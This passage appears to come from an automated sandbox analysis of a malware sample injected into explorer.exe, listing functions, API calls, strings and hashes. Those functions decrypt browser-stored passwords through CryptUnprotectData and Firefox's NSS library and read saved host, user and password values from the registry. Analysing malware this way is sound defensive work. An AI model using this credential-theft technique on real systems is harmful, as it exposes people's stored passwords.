                                                                                                                                      • Instruction ID: 99511aacf92aa2da95162d609c5532e51c87a77368a2f2cd457641b1202e248b
                                                                                                                                      • Opcode Fuzzy Hash: b6ee58036414408076280a7c28f5ccf8b063fcdb354021b41b39676eec5cad1d
                                                                                                                                      • Instruction Fuzzy Hash: 32F0967230530E7BE2149E56DC82FA77B9DEF85794F15042EB701D2141EEA2ED0542B4
                                                                                                                                      Function 007E1FCE Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E1FFA
                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 007E2015
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2807545630-0
                                                                                                                                      • Opcode ID: 61fd61b9dc7db88915075d929da1ef35db82467f67e53dde33df0cad9a76b244
                                                                                                                                      • Instruction ID: f3d908e7153af50487433017defd8651f93e2a11a1676b0d3d7974ed87d0fd84
                                                                                                                                      • Opcode Fuzzy Hash: 61fd61b9dc7db88915075d929da1ef35db82467f67e53dde33df0cad9a76b244
                                                                                                                                      • Instruction Fuzzy Hash: 6F017172A01219AB9B14CF9ADC84DAFBBBCEF48350B10046AF905D3241D7749E11CBA0
                                                                                                                                      Function 007E1198 Relevance: 3.0, APIs: 2, Instructions: 38encryptionCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 007E11B2
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 007E11D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3825993179-0
                                                                                                                                      • Opcode ID: 852028a7c0da561761bfc0e08e5d43b77a6b02d59ba7bf142102d4c366beffff
                                                                                                                                      • Instruction ID: aa1e1501741d3d7657127e4298d95e7eedfe64c123f6a25cf267333b4e0d0225
                                                                                                                                      • Opcode Fuzzy Hash: 852028a7c0da561761bfc0e08e5d43b77a6b02d59ba7bf142102d4c366beffff
                                                                                                                                      • Instruction Fuzzy Hash: 1EF0A732601158B7D724C69BDC8ADEBFB6DDFC97A1B500169F909D3140EA729D4483A0
                                                                                                                                      Function 007E24B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                        • Part of subcall function 007E1090: lstrlenW.KERNEL32(?,?,00000000,007E17E5), ref: 007E1097
                                                                                                                                        • Part of subcall function 007E1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 007E10A8
                                                                                                                                        • Part of subcall function 007E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E19C4
                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 007E2503
                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 007E250A
                                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 007E2563
                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007E2570
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 007E2591
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 007E259E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 007E25AB
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 007E25B8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 007E25C5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 007E25D2
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 007E25DF
                                                                                                                                        • Part of subcall function 007E190B: lstrlen.KERNEL32(?,?,?,?,00000000,007E2783), ref: 007E192B
                                                                                                                                        • Part of subcall function 007E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,007E2783), ref: 007E1930
                                                                                                                                        • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,?), ref: 007E1946
                                                                                                                                        • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,00000000), ref: 007E194A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                      • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                      • API String ID: 3366569387-3272982511
                                                                                                                                      • Opcode ID: 5994b67c4bb16fd0ff6285614d1036cdff2e3d7d189a7dec0d17d1e7bf059b0b
                                                                                                                                      • Instruction ID: 69087654ee12d91062c6cd66c37576f10c55a6d3e0d8ae25f222347ef06e8c68
                                                                                                                                      • Opcode Fuzzy Hash: 5994b67c4bb16fd0ff6285614d1036cdff2e3d7d189a7dec0d17d1e7bf059b0b
                                                                                                                                      • Instruction Fuzzy Hash: 66410935A023C19BCB14AB7A9C5942E3AD9FBCA740740452EE451D3252EF7C8C47CB91
                                                                                                                                      Function 007E5E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E5BF5: memset.NTDLL ref: 007E5C07
                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 007E60E1
                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 007E60EC
                                                                                                                                      • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 007E6113
                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 007E618E
                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 007E61B5
                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 007E61C1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _alldiv$_allrem$memset
                                                                                                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                      • API String ID: 2557048445-1989508764
                                                                                                                                      • Opcode ID: 01fba919cff4cdf9135b2372f3a36e083889a0b285ce9c810a5b7435869570db
                                                                                                                                      • Instruction ID: 92f771832efec0dc7e8de24064b04a5e714189bc56dfe7771c5765ee950dc7fe
                                                                                                                                      • Opcode Fuzzy Hash: 01fba919cff4cdf9135b2372f3a36e083889a0b285ce9c810a5b7435869570db
                                                                                                                                      • Instruction Fuzzy Hash: 4DB1B1B29097C69BD7359E2ACC84B3A7FD8FB9C388F140559F582D61D1E62CCD1086D1
                                                                                                                                      Function 007FD2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • memcmp.NTDLL(0083637A,BINARY,00000007), ref: 007FD324
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcmp
                                                                                                                                      • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                      • API String ID: 1475443563-3683840195
                                                                                                                                      • Opcode ID: e19ef8ccb7c3447fb1cd085b29340f80fd869660cda27f0c2f86f29ebd97fc18
                                                                                                                                      • Instruction ID: 997c4361bbb85e7d4da26b14d47a5fef362d5279bafb81973c08fc00af045556
                                                                                                                                      • Opcode Fuzzy Hash: e19ef8ccb7c3447fb1cd085b29340f80fd869660cda27f0c2f86f29ebd97fc18
                                                                                                                                      • Instruction Fuzzy Hash: 7E51BE32608348EBC7219F548845A7A73A6FF89300F144869FBA19B341E779ED09D792
                                                                                                                                      Function 007E48B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                        • Part of subcall function 007E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                        • Part of subcall function 007E482C: lstrlenW.KERNEL32(?), ref: 007E4845
                                                                                                                                        • Part of subcall function 007E482C: lstrlenW.KERNEL32(?), ref: 007E488F
                                                                                                                                        • Part of subcall function 007E482C: lstrlenW.KERNEL32(?), ref: 007E4897
                                                                                                                                      • wsprintfW.USER32 ref: 007E49A7
                                                                                                                                      • wsprintfW.USER32 ref: 007E49B9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                      • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                      • API String ID: 2889301010-4273187114
                                                                                                                                      • Opcode ID: e5fc4fdaced438d3b4139c03990c102b95854d55dc5f37009a2f6419c24d36cc
                                                                                                                                      • Instruction ID: 444d84c3cdd52159be9741f0bae0309a7bcfbb9f4fe6d74512019a1a371aecc5
                                                                                                                                      • Opcode Fuzzy Hash: e5fc4fdaced438d3b4139c03990c102b95854d55dc5f37009a2f6419c24d36cc
                                                                                                                                      • Instruction Fuzzy Hash: E331E435706384ABC710AB6BC84682FB6DDEFCD744B05891DB045E7242EABAEC0187E5
                                                                                                                                      Function 007EF92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • memcpy.NTDLL(?,?,?,?,00000000), ref: 007EFB32
                                                                                                                                      • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 007EFB4D
                                                                                                                                      • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 007EFB60
                                                                                                                                      • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 007EFB95
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcpy
                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                      • API String ID: 3510742995-3408036318
                                                                                                                                      • Opcode ID: 98728550c89753ac395afef021a9c34ec634a756ee3941399acfe4e2a6910216
                                                                                                                                      • Instruction ID: 355065e310008be8e0584e6176dec85a6c3d741a78a9a1f61764850076ba9622
                                                                                                                                      • Opcode Fuzzy Hash: 98728550c89753ac395afef021a9c34ec634a756ee3941399acfe4e2a6910216
                                                                                                                                      • Instruction Fuzzy Hash: 1CD1D4B1609381CFC714DF29C88571ABBE1AF99310F18857DF8998B392DB78D805CB62
                                                                                                                                      Function 007E7820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$-x0$NaN
                                                                                                                                      • API String ID: 0-62881354
                                                                                                                                      • Opcode ID: b56df1c0504a1ce600498c7daf8ea18ebeacd28318b0284e2b011944eeb955a8
                                                                                                                                      • Instruction ID: 090e819cee118e8213211a0f263b36f18ffef508ca52d1299fac8cfa3ad96042
                                                                                                                                      • Opcode Fuzzy Hash: b56df1c0504a1ce600498c7daf8ea18ebeacd28318b0284e2b011944eeb955a8
                                                                                                                                      • Instruction Fuzzy Hash: 04D1037060E3C28BD7298A2A849472ABBE5AFDD344F28485DF9C1C7352D678CD45D782
                                                                                                                                      Function 007E1895 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 007E18A7
                                                                                                                                      • GlobalLock.KERNEL32(WK~), ref: 007E18B6
                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 007E18F4
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 007E18E8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                      • String ID: WK~$WK~
                                                                                                                                      • API String ID: 1688112647-3136317167
                                                                                                                                      • Opcode ID: 0b9a2ef2bd4dc8bf45cae261a5273972cf16e4b19d1cf98feff1e2559e4e3f1f
                                                                                                                                      • Instruction ID: 30368e1003ef5acc53c3f0655f8ff32e5b2ca70b9297db18462690bb168d2ca6
                                                                                                                                      • Opcode Fuzzy Hash: 0b9a2ef2bd4dc8bf45cae261a5273972cf16e4b19d1cf98feff1e2559e4e3f1f
                                                                                                                                      • Instruction Fuzzy Hash: C4016275205385AF8B015F2A9C5985F7BAAFFC8761B40C82AF555C3211EF35D9249A20
                                                                                                                                      Function 007E78B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: e620c25e2e8607f619fc3bd50cf56782f530357a537910681891793f75e00133
                                                                                                                                      • Instruction ID: baf3aeafa1adf3f044f3581af6bc2d924f7373f57396bb196a1b350c7b27034e
                                                                                                                                      • Opcode Fuzzy Hash: e620c25e2e8607f619fc3bd50cf56782f530357a537910681891793f75e00133
                                                                                                                                      • Instruction Fuzzy Hash: 79E11430A0E3C28BD7298A2A849472ABBE5AFDD344F28495DF9C1C7352D67CCD45D782
                                                                                                                                      Function 007E7A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: cb66f691b7754d90f6e40320a872d3de88e0b8d984a67443520a61e75e41d07d
                                                                                                                                      • Instruction ID: f50b85d1cf54b9350ad9975dfe6b379f3db3a756d7cf933da1ccdad315f7fe06
                                                                                                                                      • Opcode Fuzzy Hash: cb66f691b7754d90f6e40320a872d3de88e0b8d984a67443520a61e75e41d07d
                                                                                                                                      • Instruction Fuzzy Hash: CEE1113060E3C28BD729CE2A849472ABBE5AFDD344F28485DF8C187352D678CD45D792
                                                                                                                                      Function 007E7A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: a4d44f3a2211d5393d3fb948c6aae46b4e8545dbdf58e54aa8b5e065525fc6d3
                                                                                                                                      • Instruction ID: 47aa82a55dcb78658a987c9698852fde75b8985f0c58de86b64dc70218f72c79
                                                                                                                                      • Opcode Fuzzy Hash: a4d44f3a2211d5393d3fb948c6aae46b4e8545dbdf58e54aa8b5e065525fc6d3
                                                                                                                                      • Instruction Fuzzy Hash: 05E1127060E3C28BD7298E2A849472ABBE5BFDD344F28495DF8C1C7252D678CD45D782
                                                                                                                                      Function 007E77F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                      • Opcode ID: bb962d7287ca01265ee4d87b6b40cc78116efe36017198eb4cd344e126da63f2
                                                                                                                                      • Instruction ID: 2f1dfbb34533fb765272ba21173c1e827906723874a8f5a67b8269ae5bd505b1
                                                                                                                                      • Opcode Fuzzy Hash: bb962d7287ca01265ee4d87b6b40cc78116efe36017198eb4cd344e126da63f2
                                                                                                                                      • Instruction Fuzzy Hash: FCE1F17060E3C28BD7298A2A849472ABBE5AFDD344F28485DF8C1C7352D678C945D782
                                                                                                                                      Function 007E70C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 007E720E
                                                                                                                                      • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 007E7226
                                                                                                                                      • _aulldvrm.NTDLL(00000000,00000000,?), ref: 007E727B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _aulldvrm$_aullrem
                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                      • API String ID: 105165338-3447725786
                                                                                                                                      • Opcode ID: 1f06822b03cadbc5f3f7f507904fe2197126a2183275592866b4ddb934ec365f
                                                                                                                                      • Instruction ID: 43e25afaf37fd08ae41797cc2da43b2879fa44db48703bb562e044eece3c3fee
                                                                                                                                      • Opcode Fuzzy Hash: 1f06822b03cadbc5f3f7f507904fe2197126a2183275592866b4ddb934ec365f
                                                                                                                                      • Instruction Fuzzy Hash: D9D1F27060E3C28BD7298A2A849472ABBE5AFDE344F28485DF9C1C7352D678CD45D782
                                                                                                                                      Function 007E898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 007E8AAD
                                                                                                                                      • _allmul.NTDLL(?,?,0000000A,00000000), ref: 007E8B66
                                                                                                                                      • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 007E8C9B
                                                                                                                                      • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 007E8CAE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _allmul$_alldvrm
                                                                                                                                      • String ID: .
                                                                                                                                      • API String ID: 115548886-248832578
                                                                                                                                      • Opcode ID: 6e98709e3727db8f4372ca23e24531cea67a90927f2b2d322382e68e386096fd
                                                                                                                                      • Instruction ID: e47334c5b4027c6c62a90f8da095b755c019f4e9d73615804a62c21ca25873d7
                                                                                                                                      • Opcode Fuzzy Hash: 6e98709e3727db8f4372ca23e24531cea67a90927f2b2d322382e68e386096fd
                                                                                                                                      • Instruction Fuzzy Hash: EDD108B194E7C58BC750CF4A884023ABBF0BBDD314F1449AEF5CD86291EBB988418797
                                                                                                                                      Function 0080D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memset
                                                                                                                                      • String ID: ,$7$9
                                                                                                                                      • API String ID: 2221118986-1653249994
                                                                                                                                      • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                      • Instruction ID: 1369fe375484d6eef31c1a0869195b2f3683099c7d9dc55387016d2cd240d6ec
                                                                                                                                      • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                      • Instruction Fuzzy Hash: 733138715083449FD760DF64D840B8BBBE9FF85344F00892EB989D6291EB71A549CBA3
                                                                                                                                      Function 007E1BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(00000000,00000000,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1BCC
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,.exe,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1BF0
                                                                                                                                      • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1C05
                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1C1C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen
                                                                                                                                      • String ID: .exe
                                                                                                                                      • API String ID: 1659193697-4119554291
                                                                                                                                      • Opcode ID: 12e83a70c410624dedf101e69f43e3eed60cdf3843e3a2b7b067d67cb726b62d
                                                                                                                                      • Instruction ID: 36b85077495053259d101f914dce69177ef399a1e9f1ce3962c4f2f660bd0a0a
                                                                                                                                      • Opcode Fuzzy Hash: 12e83a70c410624dedf101e69f43e3eed60cdf3843e3a2b7b067d67cb726b62d
                                                                                                                                      • Instruction Fuzzy Hash: 1CF0C230356660AAD3246F3A9C56ABF62A4FF49341B60882AE142C31B1FB788C51C769
                                                                                                                                      Function 007F2FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _allmul.NTDLL(?,00000000,00000018), ref: 007F316F
                                                                                                                                      • _allmul.NTDLL(-00000001,00000000,?,?), ref: 007F31D2
                                                                                                                                      • _alldiv.NTDLL(?,?,00000000), ref: 007F32DE
                                                                                                                                      • _allmul.NTDLL(00000000,?,00000000), ref: 007F32E7
                                                                                                                                      • _allmul.NTDLL(?,00000000,?,?), ref: 007F3392
                                                                                                                                        • Part of subcall function 007F16CD: memset.NTDLL ref: 007F172B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _allmul$_alldivmemset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3880648599-0
                                                                                                                                      • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                      • Instruction ID: 5bd8f47413fb50da3004ed988f45264b78027f06c85b0c4314199e7144a397ce
                                                                                                                                      • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                      • Instruction Fuzzy Hash: 31D18671608389CBDB24DF69C480A7ABBE1BF88704F14482DFA9587351DB78DE45CB92
                                                                                                                                      Function 008187FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
